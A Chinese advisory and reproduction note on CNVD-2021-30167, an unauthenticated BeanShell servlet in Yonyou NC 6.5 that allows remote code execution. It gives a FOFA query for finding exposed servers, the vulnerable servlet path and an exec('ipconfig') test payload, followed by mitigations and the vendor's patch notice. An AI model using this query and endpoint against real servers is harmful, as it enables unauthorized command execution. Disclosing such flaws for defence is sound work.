漏洞描述
该漏洞是由于用友NC对外开放了BeanShell测试接口,并没有设置权限,攻击者可利用该漏洞在未授权的情况下,构造恶意数据,执行任意代码,最终获取服务器最高权限。
用友NC 6是用友NC产品的全新系列、是面向集团企业的世界级高端管理软件。目前NC基于8000家集团企业客户的实力,使其在同类产品市场占有率已经达到亚太第一,面向大型企业集团和成长中的集团企业的信息化需求,用友NC6的产品定位于大型企业管理与电子商务平台。
漏洞验证
FOFA搜索规则:
icon_hash="1085941792"
访问页面如下:
访问造成远程命令执行的漏洞URL:
http://*.*.*.*/servlet/~ic/bsh.servlet.BshServlet
写入执行命令测试语句:
exec("ipconfig");
影响范围
目前受影响的用友NC版本:
用友NC 6.5
安全建议
1.禁止开放BeanShell访问接口
2.对BeanShell接口添加授权认证机制
用友NC官方说明:该漏洞为第三方jar包漏洞导致,用友NC官方已于4月9日解决并验证,且通过服务渠道推送了解决方案,授权用户可以访问下载链接进行下载。
下载链接:
http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19
原文始发于微信公众号(赛瑞攻防实验室):CNVD-2021-30167 用友NCBeanShell远程代码执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论